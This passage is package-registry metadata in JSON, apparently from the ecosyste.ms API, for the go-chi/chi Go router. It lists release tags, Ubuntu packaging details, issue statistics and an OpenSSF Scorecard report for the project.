/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.128Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/golang-github-go-chi-chi?arch=source\u0026distro=ubuntu-24.10\u0026repository_url=https://launchpad.net/ubuntu/oracular","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/golang-github-go-chi-chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/golang-github-go-chi-chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-go-chi-chi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-go-chi-chi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-go-chi-chi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-go-chi-chi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-go-chi-chi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/golang-github-go-chi-chi/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.10","url":"https://launchpad.net/ubuntu/oracular","ecosystem":"ubuntu","default":false,"packages_count":38437,"maintainers_count":0,"namespaces_count":4,"keywords_count":1440,"github":"ubuntu","metadata":{"codename":"oracular","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":890},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.028Z","updated_at":"2026-08-12T05:05:16.435Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/namespaces"}},{"id":14275854,"name":"github.com/Go-CHI/chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/Go-CHI/chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:18.328Z","created_at":"2026-04-18T13:11:28.955Z","updated_at":"2026-08-12T02:06:18.329Z","registry_url":"https://pkg.go.dev/github.com/Go-CHI/chi/v5","install_command":"go get github.com/Go-CHI/chi/v5","documentation_url":"https://pkg.go.dev/github.com/Go-CHI/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0